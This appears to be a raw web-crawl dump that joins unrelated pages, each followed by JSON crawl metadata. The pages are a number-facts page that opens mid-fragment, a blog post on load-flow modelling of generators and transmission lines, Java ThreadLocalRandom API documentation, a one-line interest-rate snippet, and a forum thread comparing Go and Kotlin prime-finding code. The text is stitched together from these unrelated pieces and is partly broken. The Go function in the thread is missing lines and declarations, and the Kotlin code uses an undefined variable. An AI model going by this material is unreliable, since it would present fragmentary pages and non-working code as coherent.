246,783,233,03.,469.\n\nOther Arithmetic Functions (n = 1852519000000)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 702000000000 Total number of positive integers not greater than n that are coprime to n λ(n) 11700000 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 68059911446 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 702,000,000,000 positive integers (less than 1,852,519,000,000) that are coprime with 1,852,519,000,000. And there are approximately 68,059,911,446 prime numbers less than or equal to 1,852,519,000,000.\n\nDivisibility of 1852519000000\n\n m n mod m 2 3 4 5 6 7 8 9 0 1 0 0 4 4 0 4\n\nThe number 1,852,519,000,000 is divisible by 2, 4, 5 and 8.\n\n• Abundant\n\n• Polite\n• Practical\n\n• Frugal\n\nBase conversion (1852519000000)\n\nBase System Value\n2 Binary 11010111101010010101111001010011111000000\n3 Ternary 20120002200020022210110211\n4 Quaternary 122331102233022133000\n5 Quinary 220322424331000000\n6 Senary 3535011355203504\n8 Octal 32752257123700\n10 Decimal 1852519000000\n12 Duodecimal 25b044a46594\n20 Vigesimal 3c75c3f000\n36 Base36 nn19zcn4\n\nBasic calculations (n = 1852519000000)\n\nMultiplication\n\nn×y\n n×2 3705038000000 5557557000000 7410076000000 9262595000000\n\nDivision\n\nn÷y\n n÷2 9.2626e+11 6.17506e+11 4.6313e+11 3.70504e+11\n\nExponentiation\n\nny\n n2 3431826645361000000000000 6357524065237514359000000000000000000 11777434123809734862820321000000000000000000000000 21817920485605886218337038238599000000000000000000000000000000\n\nNth Root\n\ny√n\n 2√n 1.36107e+06 12281.6 1166.65 284.153\n\n1852519000000 as geometric shapes\n\nCircle\n\n Diameter 3.70504e+12 1.16397e+13 1.07814e+25\n\nSphere\n\n Volume 2.66303e+37 4.31256e+25 1.16397e+13\n\nSquare\n\nLength = n\n Perimeter 7.41008e+12 3.43183e+24 2.61986e+12\n\nCube\n\nLength = n\n Surface area 2.0591e+25 6.35752e+36 3.20866e+12\n\nEquilateral Triangle\n\nLength = n\n Perimeter 5.55756e+12 1.48602e+24 1.60433e+12\n\nTriangular Pyramid\n\nLength = n\n Surface area 5.9441e+24 7.49241e+35 1.51258e+12\n\nCryptographic Hash Functions\n\nmd5 3f1452ce1388c98b8450f82db8af53dc 09f37a033afa70b10934150d4073130fee535546 a46d5e3e5d0befd8cf91f246f6c69594e0aeb3bac99d0f722839e61e5d30da1a 4c3dae0fb4115c1325324a7981be022a48044c47f19c74c76900ae9fbebe4a7b266de5a36c11b52813de322f4b6848f13bd2fc29b66f4491340d79666b49e1f6 57b71ccaf9bf6f9f4535d7cb895d92603c3d9030" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.61455595,"math_prob":0.99695665,"size":5295,"snap":"2022-05-2022-21","text_gpt3_token_len":1920,"char_repetition_ratio":0.15101115,"word_repetition_ratio":0.041968163,"special_character_ratio":0.51671386,"punctuation_ratio":0.11638418,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9953759,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-29T12:37:52Z\",\"WARC-Record-ID\":\"<urn:uuid:569f4382-5035-4f70-b4a3-98e100a5ad6d>\",\"Content-Length\":\"41864\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9ff20502-96da-449b-8294-9a4d5a7de9dc>\",\"WARC-Concurrent-To\":\"<urn:uuid:4521d687-da30-42ec-a06e-8d5133373cd4>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/1852519000000\",\"WARC-Payload-Digest\":\"sha1:OBVD7S2HYUJXO7OP3N4HGUN7QZNZDOIS\",\"WARC-Block-Digest\":\"sha1:EPT2VGVQVZIVDWQ5KQEEQRPMDDMWLQGZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320306181.43_warc_CC-MAIN-20220129122405-20220129152405-00274.warc.gz\"}"}
https://www.electrotechnik.net/2018/01/
[ "## Modelling the Components for a Load Flow Analysis\n\nThe Load Flow Analysis is done to determine the flow of real and reactive between different buses in a power system.  It also helps in determining the voltage and current at different locations.\n\nTo conduct a Load Flow Analysis, the components in a power system need to be modelled.  The modelling is done by developing equivalent circuits of the components, such as the generator, transmission lines and line capacitances.\n\nThe Generator equivalent circuit is shown below.\n\nThe Thevenin equivalent circuit is as shown below.", null, "This consists of a voltage source and a resistance and an inductance in series with the load.\n\nE = V + IZ\n\nwhere\n\nZ is the steady stage impedance\nV is the voltage and\nI is the current\n\nThe Norton equivalent circuit\n\nThe Norton equivalent circuit consists of a power source and an admittance in parallel.", null, "INorton = V/Z\n\nINorton = YV", null, "The load is modelled as a resistance and inductance in a series circuit that is earth\n\nTransmission lines\n\nTransmission lines are modelled as\n\nShort transmission lines (less than 80 km)\n\nShort lines that are less than 80 kms long are modelled as a resistance and reactance in series with the load.  The line capacitances are neglected.\n\nMedium (80 to 250 km)\n\nMedium lines are modelled as a resistance and reactance in series.  The admittance is in parallel in two sections.", null, "Long lines ( 250 km and above)\n\nLong lines are also modelled as a resistance and reactance in series.  The admittance is in parallel in two sections.", null, "" ]
[ null, "https://1.bp.blogspot.com/-DWCo3RY5lu4/WiJBuiXDh1I/AAAAAAAAONo/_1Sk-M5IyLUh67aiIiI6zJ8_E79S_2uOQCLcBGAs/s1600/schemeit-project%2B%25285%2529.png", null, "https://2.bp.blogspot.com/-t-8DbTd1UCY/WiJBucLkWLI/AAAAAAAAONk/wbVGP5pN-Mgj4Fi--zvUpOkSbFtFTTKqACLcBGAs/s1600/schemeit-project%2B%25284%2529.png", null, "https://2.bp.blogspot.com/-QVDw-2nyv_E/WiJBtQ4Po9I/AAAAAAAAONg/AgNNPS4YXvIrIaUBwO8wCWHwbJX9mV8nACLcBGAs/s1600/schemeit-project%2B%25283%2529.png", null, "https://1.bp.blogspot.com/-Sais5Jn2Pt4/WiJBtOcNn6I/AAAAAAAAONY/iL_zhyaOfOoFFnlEgjRSmINsAXBC4QwCQCLcBGAs/s400/schemeit-project%2B%25282%2529.png", null, "https://2.bp.blogspot.com/-Mhr-aInUcC4/WiJBtUvRjUI/AAAAAAAAONc/PUFIX2Nvm6sh7BAX2CwTElDIFbreQGbYACLcBGAs/s400/schemeit-project%2B%25281%2529.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9417405,"math_prob":0.9856167,"size":1272,"snap":"2023-40-2023-50","text_gpt3_token_len":282,"char_repetition_ratio":0.14826499,"word_repetition_ratio":0.14746544,"special_character_ratio":0.2028302,"punctuation_ratio":0.06465517,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99351937,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,4,null,4,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-25T07:40:38Z\",\"WARC-Record-ID\":\"<urn:uuid:4a79c428-eb2d-4b84-be78-c20ca7c1f1ae>\",\"Content-Length\":\"91627\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cf2fc77d-193c-4389-b2cf-5a844218d909>\",\"WARC-Concurrent-To\":\"<urn:uuid:3a87f1ff-fa86-469f-8e29-69d686dd4e19>\",\"WARC-IP-Address\":\"172.253.115.121\",\"WARC-Target-URI\":\"https://www.electrotechnik.net/2018/01/\",\"WARC-Payload-Digest\":\"sha1:HN62KZN5FBDSWVGF4S2YUYJNEXXJ2MWQ\",\"WARC-Block-Digest\":\"sha1:RWFUCUSJIIW7YEAVYTUALCXCRMMWHLFV\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506686.80_warc_CC-MAIN-20230925051501-20230925081501-00759.warc.gz\"}"}
https://curry.ateneo.net/javadocs/api/java/util/concurrent/ThreadLocalRandom.html
[ "Java™ Platform\nStandard Ed. 8\ncompact1, compact2, compact3\njava.util.concurrent\n\n• All Implemented Interfaces:\nSerializable\n\n```public class ThreadLocalRandom\nextends Random```\nA random number generator isolated to the current thread. Like the global `Random` generator used by the `Math` class, a `ThreadLocalRandom` is initialized with an internally generated seed that may not otherwise be modified. When applicable, use of `ThreadLocalRandom` rather than shared `Random` objects in concurrent programs will typically encounter much less overhead and contention. Use of `ThreadLocalRandom` is particularly appropriate when multiple tasks (for example, each a `ForkJoinTask`) use random numbers in parallel in thread pools.\n\nUsages of this class should typically be of the form: `ThreadLocalRandom.current().nextX(...)` (where `X` is `Int`, `Long`, etc). When all usages are of this form, it is never possible to accidently share a `ThreadLocalRandom` across multiple threads.\n\nThis class also provides additional commonly used bounded random generation methods.\n\nInstances of `ThreadLocalRandom` are not cryptographically secure. Consider instead using `SecureRandom` in security-sensitive applications. Additionally, default-constructed instances do not use a cryptographically random seed unless the system property `java.util.secureRandomSeed` is set to `true`.\n\nSince:\n1.7\nSerialized Form\n• ### Method Summary\n\nAll Methods\nModifier and Type Method and Description\n`static ThreadLocalRandom` `current()`\nReturns the current thread's `ThreadLocalRandom`.\n`DoubleStream` `doubles()`\nReturns an effectively unlimited stream of pseudorandom `double` values, each between zero (inclusive) and one (exclusive).\n`DoubleStream` ```doubles(double randomNumberOrigin, double randomNumberBound)```\nReturns an effectively unlimited stream of pseudorandom `double` values, each conforming to the given origin (inclusive) and bound (exclusive).\n`DoubleStream` `doubles(long streamSize)`\nReturns a stream producing the given `streamSize` number of pseudorandom `double` values, each between zero (inclusive) and one (exclusive).\n`DoubleStream` ```doubles(long streamSize, double randomNumberOrigin, double randomNumberBound)```\nReturns a stream producing the given `streamSize` number of pseudorandom `double` values, each conforming to the given origin (inclusive) and bound (exclusive).\n`IntStream` `ints()`\nReturns an effectively unlimited stream of pseudorandom `int` values.\n`IntStream` ```ints(int randomNumberOrigin, int randomNumberBound)```\nReturns an effectively unlimited stream of pseudorandom `int` values, each conforming to the given origin (inclusive) and bound (exclusive).\n`IntStream` `ints(long streamSize)`\nReturns a stream producing the given `streamSize` number of pseudorandom `int` values.\n`IntStream` ```ints(long streamSize, int randomNumberOrigin, int randomNumberBound)```\nReturns a stream producing the given `streamSize` number of pseudorandom `int` values, each conforming to the given origin (inclusive) and bound (exclusive).\n`LongStream` `longs()`\nReturns an effectively unlimited stream of pseudorandom `long` values.\n`LongStream` `longs(long streamSize)`\nReturns a stream producing the given `streamSize` number of pseudorandom `long` values.\n`LongStream` ```longs(long randomNumberOrigin, long randomNumberBound)```\nReturns an effectively unlimited stream of pseudorandom `long` values, each conforming to the given origin (inclusive) and bound (exclusive).\n`LongStream` ```longs(long streamSize, long randomNumberOrigin, long randomNumberBound)```\nReturns a stream producing the given `streamSize` number of pseudorandom `long`, each conforming to the given origin (inclusive) and bound (exclusive).\n`protected int` `next(int bits)`\nGenerates the next pseudorandom number.\n`boolean` `nextBoolean()`\nReturns a pseudorandom `boolean` value.\n`double` `nextDouble()`\nReturns a pseudorandom `double` value between zero (inclusive) and one (exclusive).\n`double` `nextDouble(double bound)`\nReturns a pseudorandom `double` value between 0.0 (inclusive) and the specified bound (exclusive).\n`double` ```nextDouble(double origin, double bound)```\nReturns a pseudorandom `double` value between the specified origin (inclusive) and bound (exclusive).\n`float` `nextFloat()`\nReturns a pseudorandom `float` value between zero (inclusive) and one (exclusive).\n`double` `nextGaussian()`\nReturns the next pseudorandom, Gaussian (\"normally\") distributed `double` value with mean `0.0` and standard deviation `1.0` from this random number generator's sequence.\n`int` `nextInt()`\nReturns a pseudorandom `int` value.\n`int` `nextInt(int bound)`\nReturns a pseudorandom `int` value between zero (inclusive) and the specified bound (exclusive).\n`int` ```nextInt(int origin, int bound)```\nReturns a pseudorandom `int` value between the specified origin (inclusive) and the specified bound (exclusive).\n`long` `nextLong()`\nReturns a pseudorandom `long` value.\n`long` `nextLong(long bound)`\nReturns a pseudorandom `long` value between zero (inclusive) and the specified bound (exclusive).\n`long` ```nextLong(long origin, long bound)```\nReturns a pseudorandom `long` value between the specified origin (inclusive) and the specified bound (exclusive).\n`void` `setSeed(long seed)`\nThrows `UnsupportedOperationException`.\n• ### Methods inherited from class java.util.Random\n\n`nextBytes`\n• ### Methods inherited from class java.lang.Object\n\n`clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait`\n• ### Method Detail\n\n• #### current\n\n`public static ThreadLocalRandom current()`\nReturns the current thread's `ThreadLocalRandom`.\nReturns:\nthe current thread's `ThreadLocalRandom`\n• #### setSeed\n\n`public void setSeed(long seed)`\nThrows `UnsupportedOperationException`. Setting seeds in this generator is not supported.\nOverrides:\n`setSeed` in class `Random`\nParameters:\n`seed` - the initial seed\nThrows:\n`UnsupportedOperationException` - always\n• #### next\n\n`protected int next(int bits)`\nDescription copied from class: `Random`\nGenerates the next pseudorandom number. Subclasses should override this, as this is used by all other methods.\n\nThe general contract of `next` is that it returns an `int` value and if the argument `bits` is between `1` and `32` (inclusive), then that many low-order bits of the returned value will be (approximately) independently chosen bit values, each of which is (approximately) equally likely to be `0` or `1`. The method `next` is implemented by class `Random` by atomically updating the seed to\n\n`` (seed * 0x5DEECE66DL + 0xBL) & ((1L << 48) - 1)``\nand returning\n`` (int)(seed >>> (48 - bits))`.`\nThis is a linear congruential pseudorandom number generator, as defined by D. H. Lehmer and described by Donald E. Knuth in The Art of Computer Programming, Volume 3: Seminumerical Algorithms, section 3.2.1.\nOverrides:\n`next` in class `Random`\nParameters:\n`bits` - random bits\nReturns:\nthe next pseudorandom value from this random number generator's sequence\n• #### nextInt\n\n`public int nextInt()`\nReturns a pseudorandom `int` value.\nOverrides:\n`nextInt` in class `Random`\nReturns:\na pseudorandom `int` value\n• #### nextInt\n\n`public int nextInt(int bound)`\nReturns a pseudorandom `int` value between zero (inclusive) and the specified bound (exclusive).\nOverrides:\n`nextInt` in class `Random`\nParameters:\n`bound` - the upper bound (exclusive). Must be positive.\nReturns:\na pseudorandom `int` value between zero (inclusive) and the bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `bound` is not positive\n• #### nextInt\n\n```public int nextInt(int origin,\nint bound)```\nReturns a pseudorandom `int` value between the specified origin (inclusive) and the specified bound (exclusive).\nParameters:\n`origin` - the least value returned\n`bound` - the upper bound (exclusive)\nReturns:\na pseudorandom `int` value between the origin (inclusive) and the bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `origin` is greater than or equal to `bound`\n• #### nextLong\n\n`public long nextLong()`\nReturns a pseudorandom `long` value.\nOverrides:\n`nextLong` in class `Random`\nReturns:\na pseudorandom `long` value\n• #### nextLong\n\n`public long nextLong(long bound)`\nReturns a pseudorandom `long` value between zero (inclusive) and the specified bound (exclusive).\nParameters:\n`bound` - the upper bound (exclusive). Must be positive.\nReturns:\na pseudorandom `long` value between zero (inclusive) and the bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `bound` is not positive\n• #### nextLong\n\n```public long nextLong(long origin,\nlong bound)```\nReturns a pseudorandom `long` value between the specified origin (inclusive) and the specified bound (exclusive).\nParameters:\n`origin` - the least value returned\n`bound` - the upper bound (exclusive)\nReturns:\na pseudorandom `long` value between the origin (inclusive) and the bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `origin` is greater than or equal to `bound`\n• #### nextDouble\n\n`public double nextDouble()`\nReturns a pseudorandom `double` value between zero (inclusive) and one (exclusive).\nOverrides:\n`nextDouble` in class `Random`\nReturns:\na pseudorandom `double` value between zero (inclusive) and one (exclusive)\n`Math.random()`\n• #### nextDouble\n\n`public double nextDouble(double bound)`\nReturns a pseudorandom `double` value between 0.0 (inclusive) and the specified bound (exclusive).\nParameters:\n`bound` - the upper bound (exclusive). Must be positive.\nReturns:\na pseudorandom `double` value between zero (inclusive) and the bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `bound` is not positive\n• #### nextDouble\n\n```public double nextDouble(double origin,\ndouble bound)```\nReturns a pseudorandom `double` value between the specified origin (inclusive) and bound (exclusive).\nParameters:\n`origin` - the least value returned\n`bound` - the upper bound (exclusive)\nReturns:\na pseudorandom `double` value between the origin (inclusive) and the bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `origin` is greater than or equal to `bound`\n• #### nextBoolean\n\n`public boolean nextBoolean()`\nReturns a pseudorandom `boolean` value.\nOverrides:\n`nextBoolean` in class `Random`\nReturns:\na pseudorandom `boolean` value\n• #### nextFloat\n\n`public float nextFloat()`\nReturns a pseudorandom `float` value between zero (inclusive) and one (exclusive).\nOverrides:\n`nextFloat` in class `Random`\nReturns:\na pseudorandom `float` value between zero (inclusive) and one (exclusive)\n• #### nextGaussian\n\n`public double nextGaussian()`\nDescription copied from class: `Random`\nReturns the next pseudorandom, Gaussian (\"normally\") distributed `double` value with mean `0.0` and standard deviation `1.0` from this random number generator's sequence.\n\nThe general contract of `nextGaussian` is that one `double` value, chosen from (approximately) the usual normal distribution with mean `0.0` and standard deviation `1.0`, is pseudorandomly generated and returned.\n\nThe method `nextGaussian` is implemented by class `Random` as if by a threadsafe version of the following:\n\n``` ```\nprivate double nextNextGaussian;\nprivate boolean haveNextNextGaussian = false;\n\npublic double nextGaussian() {\nif (haveNextNextGaussian) {\nhaveNextNextGaussian = false;\nreturn nextNextGaussian;\n} else {\ndouble v1, v2, s;\ndo {\nv1 = 2 * nextDouble() - 1; // between -1.0 and 1.0\nv2 = 2 * nextDouble() - 1; // between -1.0 and 1.0\ns = v1 * v1 + v2 * v2;\n} while (s >= 1 || s == 0);\ndouble multiplier = StrictMath.sqrt(-2 * StrictMath.log(s)/s);\nnextNextGaussian = v2 * multiplier;\nhaveNextNextGaussian = true;\nreturn v1 * multiplier;\n}\n}``````\nThis uses the polar method of G. E. P. Box, M. E. Muller, and G. Marsaglia, as described by Donald E. Knuth in The Art of Computer Programming, Volume 3: Seminumerical Algorithms, section 3.4.1, subsection C, algorithm P. Note that it generates two independent values at the cost of only one call to `StrictMath.log` and one call to `StrictMath.sqrt`.\nOverrides:\n`nextGaussian` in class `Random`\nReturns:\nthe next pseudorandom, Gaussian (\"normally\") distributed `double` value with mean `0.0` and standard deviation `1.0` from this random number generator's sequence\n• #### ints\n\n`public IntStream ints(long streamSize)`\nReturns a stream producing the given `streamSize` number of pseudorandom `int` values.\nOverrides:\n`ints` in class `Random`\nParameters:\n`streamSize` - the number of values to generate\nReturns:\na stream of pseudorandom `int` values\nThrows:\n`IllegalArgumentException` - if `streamSize` is less than zero\nSince:\n1.8\n• #### ints\n\n`public IntStream ints()`\nReturns an effectively unlimited stream of pseudorandom `int` values.\nOverrides:\n`ints` in class `Random`\nImplementation Note:\nThis method is implemented to be equivalent to `ints(Long.MAX_VALUE)`.\nReturns:\na stream of pseudorandom `int` values\nSince:\n1.8\n• #### ints\n\n```public IntStream ints(long streamSize,\nint randomNumberOrigin,\nint randomNumberBound)```\nReturns a stream producing the given `streamSize` number of pseudorandom `int` values, each conforming to the given origin (inclusive) and bound (exclusive).\nOverrides:\n`ints` in class `Random`\nParameters:\n`streamSize` - the number of values to generate\n`randomNumberOrigin` - the origin (inclusive) of each random value\n`randomNumberBound` - the bound (exclusive) of each random value\nReturns:\na stream of pseudorandom `int` values, each with the given origin (inclusive) and bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `streamSize` is less than zero, or `randomNumberOrigin` is greater than or equal to `randomNumberBound`\nSince:\n1.8\n• #### ints\n\n```public IntStream ints(int randomNumberOrigin,\nint randomNumberBound)```\nReturns an effectively unlimited stream of pseudorandom `int` values, each conforming to the given origin (inclusive) and bound (exclusive).\nOverrides:\n`ints` in class `Random`\nImplementation Note:\nThis method is implemented to be equivalent to `ints(Long.MAX_VALUE, randomNumberOrigin, randomNumberBound)`.\nParameters:\n`randomNumberOrigin` - the origin (inclusive) of each random value\n`randomNumberBound` - the bound (exclusive) of each random value\nReturns:\na stream of pseudorandom `int` values, each with the given origin (inclusive) and bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `randomNumberOrigin` is greater than or equal to `randomNumberBound`\nSince:\n1.8\n• #### longs\n\n`public LongStream longs(long streamSize)`\nReturns a stream producing the given `streamSize` number of pseudorandom `long` values.\nOverrides:\n`longs` in class `Random`\nParameters:\n`streamSize` - the number of values to generate\nReturns:\na stream of pseudorandom `long` values\nThrows:\n`IllegalArgumentException` - if `streamSize` is less than zero\nSince:\n1.8\n• #### longs\n\n`public LongStream longs()`\nReturns an effectively unlimited stream of pseudorandom `long` values.\nOverrides:\n`longs` in class `Random`\nImplementation Note:\nThis method is implemented to be equivalent to `longs(Long.MAX_VALUE)`.\nReturns:\na stream of pseudorandom `long` values\nSince:\n1.8\n• #### longs\n\n```public LongStream longs(long streamSize,\nlong randomNumberOrigin,\nlong randomNumberBound)```\nReturns a stream producing the given `streamSize` number of pseudorandom `long`, each conforming to the given origin (inclusive) and bound (exclusive).\nOverrides:\n`longs` in class `Random`\nParameters:\n`streamSize` - the number of values to generate\n`randomNumberOrigin` - the origin (inclusive) of each random value\n`randomNumberBound` - the bound (exclusive) of each random value\nReturns:\na stream of pseudorandom `long` values, each with the given origin (inclusive) and bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `streamSize` is less than zero, or `randomNumberOrigin` is greater than or equal to `randomNumberBound`\nSince:\n1.8\n• #### longs\n\n```public LongStream longs(long randomNumberOrigin,\nlong randomNumberBound)```\nReturns an effectively unlimited stream of pseudorandom `long` values, each conforming to the given origin (inclusive) and bound (exclusive).\nOverrides:\n`longs` in class `Random`\nImplementation Note:\nThis method is implemented to be equivalent to `longs(Long.MAX_VALUE, randomNumberOrigin, randomNumberBound)`.\nParameters:\n`randomNumberOrigin` - the origin (inclusive) of each random value\n`randomNumberBound` - the bound (exclusive) of each random value\nReturns:\na stream of pseudorandom `long` values, each with the given origin (inclusive) and bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `randomNumberOrigin` is greater than or equal to `randomNumberBound`\nSince:\n1.8\n• #### doubles\n\n`public DoubleStream doubles(long streamSize)`\nReturns a stream producing the given `streamSize` number of pseudorandom `double` values, each between zero (inclusive) and one (exclusive).\nOverrides:\n`doubles` in class `Random`\nParameters:\n`streamSize` - the number of values to generate\nReturns:\na stream of `double` values\nThrows:\n`IllegalArgumentException` - if `streamSize` is less than zero\nSince:\n1.8\n• #### doubles\n\n`public DoubleStream doubles()`\nReturns an effectively unlimited stream of pseudorandom `double` values, each between zero (inclusive) and one (exclusive).\nOverrides:\n`doubles` in class `Random`\nImplementation Note:\nThis method is implemented to be equivalent to `doubles(Long.MAX_VALUE)`.\nReturns:\na stream of pseudorandom `double` values\nSince:\n1.8\n• #### doubles\n\n```public DoubleStream doubles(long streamSize,\ndouble randomNumberOrigin,\ndouble randomNumberBound)```\nReturns a stream producing the given `streamSize` number of pseudorandom `double` values, each conforming to the given origin (inclusive) and bound (exclusive).\nOverrides:\n`doubles` in class `Random`\nParameters:\n`streamSize` - the number of values to generate\n`randomNumberOrigin` - the origin (inclusive) of each random value\n`randomNumberBound` - the bound (exclusive) of each random value\nReturns:\na stream of pseudorandom `double` values, each with the given origin (inclusive) and bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `streamSize` is less than zero\n`IllegalArgumentException` - if `randomNumberOrigin` is greater than or equal to `randomNumberBound`\nSince:\n1.8\n• #### doubles\n\n```public DoubleStream doubles(double randomNumberOrigin,\ndouble randomNumberBound)```\nReturns an effectively unlimited stream of pseudorandom `double` values, each conforming to the given origin (inclusive) and bound (exclusive).\nOverrides:\n`doubles` in class `Random`\nImplementation Note:\nThis method is implemented to be equivalent to `doubles(Long.MAX_VALUE, randomNumberOrigin, randomNumberBound)`.\nParameters:\n`randomNumberOrigin` - the origin (inclusive) of each random value\n`randomNumberBound` - the bound (exclusive) of each random value\nReturns:\na stream of pseudorandom `double` values, each with the given origin (inclusive) and bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `randomNumberOrigin` is greater than or equal to `randomNumberBound`\nSince:\n1.8" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.68853647,"math_prob":0.8175895,"size":14453,"snap":"2022-27-2022-33","text_gpt3_token_len":3287,"char_repetition_ratio":0.23468752,"word_repetition_ratio":0.50251,"special_character_ratio":0.19677575,"punctuation_ratio":0.106284656,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9810593,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-03T11:33:30Z\",\"WARC-Record-ID\":\"<urn:uuid:d7bc4795-cb6c-40d6-a022-c5e5511999be>\",\"Content-Length\":\"58354\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:40e1b2a7-5b4b-434f-bc17-bcce16a76f59>\",\"WARC-Concurrent-To\":\"<urn:uuid:5b17109a-b813-4102-b11e-305b001df39d>\",\"WARC-IP-Address\":\"202.125.102.131\",\"WARC-Target-URI\":\"https://curry.ateneo.net/javadocs/api/java/util/concurrent/ThreadLocalRandom.html\",\"WARC-Payload-Digest\":\"sha1:Q5HJEG3OTVPV2XA47CTNZCHQVZ53UNCD\",\"WARC-Block-Digest\":\"sha1:WCISLNKBKAJU2YMXQD4PSDAI3D7IADFI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104240553.67_warc_CC-MAIN-20220703104037-20220703134037-00041.warc.gz\"}"}
https://www.docslides.com/tawny-fly/annual-actual-interest-rate-calculation-formula-and-samples-banks-calc
[ "", null, "127K - views\n\n# ANNUAL ACTUAL INTEREST RATE CALCULATION FORMULA AND SAMPLES Banks calculate annu\n\nThe annual actual interest rate is the customers total expens es on crediting expressed by annual interest rate of the credit granted The a nnual actual interest rate is calculated by the following formula where i annual actual interest rate A in" ]
[ null, "https://www.docslides.com/dplay.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89290214,"math_prob":0.98464376,"size":1055,"snap":"2020-45-2020-50","text_gpt3_token_len":211,"char_repetition_ratio":0.17792578,"word_repetition_ratio":0.44970414,"special_character_ratio":0.18957347,"punctuation_ratio":0.069518715,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99889416,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-21T21:53:49Z\",\"WARC-Record-ID\":\"<urn:uuid:42c5ee06-2b20-47fc-96c7-4c5bef713c6b>\",\"Content-Length\":\"25342\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6884250b-3272-428f-888f-23eadcc29d42>\",\"WARC-Concurrent-To\":\"<urn:uuid:2fac370c-d85d-436f-a9be-0d5e5a230f09>\",\"WARC-IP-Address\":\"107.180.57.28\",\"WARC-Target-URI\":\"https://www.docslides.com/tawny-fly/annual-actual-interest-rate-calculation-formula-and-samples-banks-calc\",\"WARC-Payload-Digest\":\"sha1:EJWTPL2OSAJFRVWBBBOO2F7V4FJSYEJX\",\"WARC-Block-Digest\":\"sha1:2K3GJ5BRSMROWZ5NIYIN6JFPRCGLGBDK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107878633.8_warc_CC-MAIN-20201021205955-20201021235955-00264.warc.gz\"}"}
https://forum.golangbridge.org/t/go-vs-kotlin-performance-nth-prime-calculation/17022
[ "", null, "# Go vs Kotlin Performance - Nth Prime Calculation\n\n(Luke Bullard) #1\n\nI was doing a test comparison in performance between Go and Kotlin and decided to test out how the two compare in regards to calculating the `N`th prime number. From my testing, I found that on average, Go took around twice the amount of time to calculate any `N`th prime number that Kotlin took. For instance, if Kotlin took `~250,000ns` to calculate the 100th prime, then Go took `~500,000ns`.\n\nAs an aside, I’m aware of optimizations of calculating the `N`th prime number, such as the Sieve of Eratosthenes, but I was originally using these two functions to simulate heavy computational work in a RESTful microservice. I posted the two functions I used below.\n\nIs Kotlin simply faster than Go in this regard? Or is there something else I’m missing?\n\nThank you so much\n\n`````` fun simplePrime(primeN : Int) : Int {\nvar primeI = 0\nvar currNum = 1\nwhile (primeI < primeN) {\ncurrNum += 1\nvar isPrime = true\nfor (i in 2..currNum/2) {\nif (num % i == 0) {\nisPrime = false\nbreak\n}\n}\nif (isPrime) {\nprimeI += 1\n}\n}\nreturn currNum\n}\n``````\n``````func getNthPrime(num int) int {\ncurrNum := 1\ncurrNum++\nisPrime := true\nfor i := 2; i < currNum/2; i++ {\nif currNum % i == 0 {\nisPrime = false\nbreak\n}\n}\nif isPrime {\n}\n}\n}\n``````\n\n(Lucas Bremgartner) #2\n\nThe code in Kotlin and the code in Go are not the same. In Go the loop condition should be\n\n`for i := 2; i < currNum/2; i++`\n\nto be on par with the Kotlin version. With that fix, the time for the Go code is actually cut by ~50%, so I guess Kotlin and Go are more or less on par.\n\nBeside of this, I suggest to use the same var names in both versions, which would make it easier to compare the code. I think the Kotlin code does have some typos as well: I guess the var `num` should be `currNum`.\n\n(Luke Bullard) #3\n\nSorry, I didn’t post the same version of the function. I’ll update the post.\n\nI originally had them both iterating through the entire set of numbers, but changed optimized it a bit to be more realistic, but I didn’t realize I posted the optimized version for Kotlin and not for Go. But for the numbers and data I found, I tested using the “optimized” function for both.\n\n(Lucas Bremgartner) 